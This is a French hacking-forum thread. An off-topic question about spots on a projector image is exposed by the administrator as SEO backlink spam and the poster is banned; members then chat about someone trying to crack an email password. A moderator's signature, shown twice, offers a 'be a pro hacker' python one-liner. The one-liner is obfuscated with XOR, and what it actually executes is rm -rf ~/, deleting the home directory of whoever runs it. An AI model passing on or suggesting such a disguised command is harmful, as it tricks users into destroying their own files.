Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 11-11-2013 07:06:36

anfrance
Banni(e)

Petites bulles sur l’image du vp

Bonjour,   Je me tourne vers ce forum, je suis animateur de soirée et je possède un vidéoprojecteur Benq technologie DLP qui à 2 ou 3 ans.  La lampe à un peu 300 h. Il m'est apparu un problème après une longue utilisation en soirée 6 ou 7h d'affilé.  J'ai pleins de "petites bulles" qui s'affichent sur l'écran. Sur la moitié inférieure. Et ça a vraiment la forme de bulles c'est étrange. Par contre ça me fait un carré noir comme si y'avait une tâche sur le bas à droite. Est ce que vous auriez une idée de ce que c'est ? De quoi ça vient?  J'ai démonté l’ampoule videoprojecteur mais elle est nickel, je vais avoir besoin de mon vidéo dans 2 semaines, je peux en racheter un mais il ne doit pas y avoir grand chose vu que l'image apparait quand même.  Merci d'avance à ceux qui pourront m'aider et ceux qui se seront arrêter ici.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 11-11-2013 09:21:03

Furyo
Membre Irremplaçable
Site Web

Re : Petites bulles sur l’image du vp

Bonjour et Bienvenue wink

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#3 11-11-2013 10:02:35

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

Nettoie le mirroir, c'est souvent la cause d'un souci d'affichage, sinon change l'ampoule.

1310812721.gif

#4 11-11-2013 10:18:04

spawn
Modérateur

C'est un classique des vidéoprojecteurs qui restent allumés trop longtemps.

Quand on laisse un vidéoprojecteur faire son écran bleu toute la nuit dans une salle de classe, il en est marqué à vie et après quelques minutes de chauffage plein de taches apparaîtront.

Je ne sais pas pourquoi, mais je sais que des taches (~pixels morts) apparaîssent dans ces cas là.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 11-11-2013 21:50:08

FFOO31
Membre d'Or

oui je doute fort des pixels morts, j'ai vu le meme cas dans un TV LCD

#6 11-11-2013 22:02:58

M1ck3y
Administrateur
Lieu : Lost in the darkness

Les enfants, un jour je vous apprendrais à déceler les posteurs normaux des spammers...

Alors, les petites astuces de tonton M1ck3y:

astuce numéro 1: le gars sort de nulle part, poste une question sans rapport avec la thématique du forum, et dans une section carrément inadéquate. Bon, ça n'a encore rien d'extraordinaire, mais attendez la suite...

astuce numéro 2: le gars nous cale un bon gros lien sur le mot clé "ampoule vidéoprojecteur". Pourquoi ce lien? Ca mène vers un site commercial, pas un wiki. Dès fois qu'on serait des anes et qu'on ne sache pas ce qu'est une ampoule de vidéoprojecteur, on n'a qu'à aller en acheter une? Hum hum, ce post pue...

astuce numéro3: en collant un extrait du post sur un moteur de recherche:

"Je me tourne vers ce forum, je suis animateur de soirée"

on découvre que notre ami a déja bafoué l'une de nos règles, à savoir pas de sujets copiés collés depuis d'autres forums. Observez bien son sujet sur le forum hardware.fr: Problème sur l'image de mon vidéoprojecteur (j'ai anonimyzé le lien, pour ne pas lui accorder un bénéfice avec un backlink sortant de chez nous, vous allez comprendre pourquoi). Lisez bien ce sujet, vous pouvez voir qu'il donne une autre réponse ou il appuie encore bien l'expression "lampe de projecteur", toujours avec le meme lien vers un site de commerce.

Alors écoutez moi bien les enfants, cette personne n'a absolument aucun problème de vidéoprojecteur, et n'en a que faire de vos réponses. Son seul objectif est de placer des backlinks vers un site de commerce pour pousser son référencement sur certains mots clés. La question, c'est pourquoi avoir posté chez nous... Peut etre qu'on ressort bien sur des mots clés associés aux vidéoprojecteurs, je n'en sais rien. En tout cas, ici les spammers c'est out. Allez, BAN (et j'édite le post pour virer le link).

#7 11-11-2013 22:19:56

FFOO31
Membre d'Or

heureusement on a Mickey big_smile

#8 11-11-2013 23:11:48

Furyo
Membre Irremplaçable
Site Web

M1ck3y a écrit :

Les enfants, un jour je vous apprendrais à déceler les posteurs normaux des spammers...

Alors, les petites astuces de tonton M1ck3y:

astuce numéro 1: le gars sort de nulle part, poste une question sans rapport avec la thématique du forum, et dans une section carrément inadéquate. Bon, ça n'a encore rien d'extraordinaire, mais attendez la suite...

astuce numéro 2: le gars nous cale un bon gros lien sur le mot clé "ampoule vidéoprojecteur". Pourquoi ce lien? Ca mène vers un site commercial, pas un wiki. Dès fois qu'on serait des anes et qu'on ne sache pas ce qu'est une ampoule de vidéoprojecteur, on n'a qu'à aller en acheter une? Hum hum, ce post pue...

astuce numéro3: en collant un extrait du post sur un moteur de recherche:

"Je me tourne vers ce forum, je suis animateur de soirée"

on découvre que notre ami a déja bafoué l'une de nos règles, à savoir pas de sujets copiés collés depuis d'autres forums. Observez bien son sujet sur le forum hardware.fr: Problème sur l'image de mon vidéoprojecteur (j'ai anonimyzé le lien, pour ne pas lui accorder un bénéfice avec un backlink sortant de chez nous, vous allez comprendre pourquoi). Lisez bien ce sujet, vous pouvez voir qu'il donne une autre réponse ou il appuie encore bien l'expression "lampe de projecteur", toujours avec le meme lien vers un site de commerce.

Alors écoutez moi bien les enfants, cette personne n'a absolument aucun problème de vidéoprojecteur, et n'en a que faire de vos réponses. Son seul objectif est de placer des backlinks vers un site de commerce pour pousser son référencement sur certains mots clés. La question, c'est pourquoi avoir posté chez nous... Peut etre qu'on ressort bien sur des mots clés associés aux vidéoprojecteurs, je n'en sais rien. En tout cas, ici les spammers c'est out. Allez, BAN (et j'édite le post pour virer le link).

Merci papa, mais je sais tout autant que toi que tous les liens ne se rapprochant pas d'un fil de discussion du forum, Bah, c'est ouvert, mais sous VM par plus de securité... wink

D'ailleurs ca me fait plaisirs que tu nous parles de çà car un petit malin du forum (vu que mon mail d'inscription n'appartient qu'a ce forum), s'amuse à essayer de cracker mon MDP...) de ce compte mail justement lol

J'en profite pour lui dire qu'il en a pour des années lumières et que je vais le changer tous les 4 heures avec un melange de 16 caracteres/chiffres/lettres et cela de maniere aleatoire et pour l'amuser un peu plus, je mettrai en place un clavier multilanguage pour permettre l'ensemble des caracteres et languages internationaux...  lol

Top, c'est partit

et bon courage mon garcon!!! lol lol lol

Amuses toi bien lol

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#9 11-11-2013 23:35:19

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

lol Allez, un ptit Gervais au fruit ça permet de grandir et d'avoir des os solides tongue

Dernière modification par Fuji (11-11-2013 23:36:10)

#10 12-11-2013 00:08:32

M1ck3y
Administrateur

Furyo, je n'ai pas bien saisi. Tu veux dire que ton compte mail est une adresse qui n'a été communiquée qu'au forum lors de ton inscription ici, et jamais à personne d'autre (tu n'as donc jamais envoyé de mail avec) et que quelqu'un essaye d'en cracker le mdp? Attention, car si tu n'as jamais donné l'adresse à personne alors il n'y a que moi et les modos qui pouvons la connaitre, et je t'assure qu'on a bien mieux à faire que d'essayer de cracker ta boite mail.

#11 12-11-2013 01:37:06

le dirdir
Membre d'Or

Furyo a écrit :

J'en profite pour lui dire qu'il en a pour des années lumières et que je vais le changer tous les 4 heures avec un melange de 16 caracteres/chiffres/lettres et cela de maniere aleatoire et pour l'amuser un peu plus, je mettrai en place un clavier multilanguage pour permettre l'ensemble des caracteres et languages internationaux...  lol

Mine de rien, tu divulgues des infos sensibles. tongue

Tant vaut l'antenne, tant vaut le poste

#12 12-11-2013 09:19:01

spawn
Modérateur

big_smile

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#13 12-11-2013 12:18:51

Furyo
Membre Irremplaçable
Site Web

M1ck3y a écrit :

Furyo, je n'ai pas bien saisi. Tu veux dire que ton compte mail est une adresse qui n'a été communiquée qu'au forum lors de ton inscription ici, et jamais à personne d'autre (tu n'as donc jamais envoyé de mail avec) et que quelqu'un essaye d'en cracker le mdp? Attention, car si tu n'as jamais donné l'adresse à personne alors il n'y a que moi et les modos qui pouvons la connaitre, et je t'assure qu'on a bien mieux à faire que d'essayer de cracker ta boite mail.

Bonjour Mick3y wink

Oui, ce compte mail est reservé exclusivement à ce forum wink

1/ Loin de moi, l'idée, de mettre en cause les gens du staff de ce forum... Mais alors tres tres loin, bien au contraire vous faites tous un travail formidable wink

2/ J'ai recu souvent des mails pour te l'aide (de la part souvent de membre à qui l'on ne repondait pas ou des personnes n'ayant que quelques messages et qui voulaient de l'aide) et j'ai donc refusé de le faire par la voie des mails sinon, l'existence de ce forum et du partage de connaissances n'aurrait plus d'interets...

En repondant à ces personnes par mail, j'ai forcement mon adresse qui est apparue et donc je soupconne l'un deux qui n'a sans doute pas apprecié ma reponse negative et qui s'amuse donc à essayer d'entrer wink

@ledirdir : c'est voulu wink

387003.jpg

#14 12-11-2013 23:39:55

M1ck3y
Administrateur

Pour info, quand tu envoies un MP à un membre du forum, tu as cet avertissement:

Veuillez prendre note qu'en utilisant ce formulaire, vous divulguerez votre adresse électronique au destinataire.

Donc toutes les personnes à qui tu envoies un MP ont connaissance de ton adresse mail. De la meme manière à chaque fois que tu réponds à un MP par mail, tu envoies un email au membre en question, qui a connaissance de ton adresse mail.

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]